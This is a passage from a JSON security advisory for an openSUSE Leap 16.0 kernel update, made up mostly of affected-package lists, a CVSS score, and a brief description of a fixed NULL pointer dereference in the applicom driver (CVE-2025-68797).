"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68795"
},
{
"cve": "CVE-2025-68797",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68797"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nchar: applicom: fix NULL pointer dereference in ac_ioctl\n\nDiscovered by Atuin - Automated Vulnerability Discovery Engine.\n\nIn ac_ioctl, the validation of IndexCard and the check for a valid\nRamIO pointer are skipped when cmd is 6. However, the function\nunconditionally executes readb(apbs[IndexCard].RamIO + VERS) at the\nend.\n\nIf cmd is 6, IndexCard may reference a board that does not exist\n(where RamIO is NULL), leading to a NULL pointer dereference.\n\nFix this by skipping the readb access when cmd is 6, as this\ncommand is a global information query and does not target a specific\nboard context.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
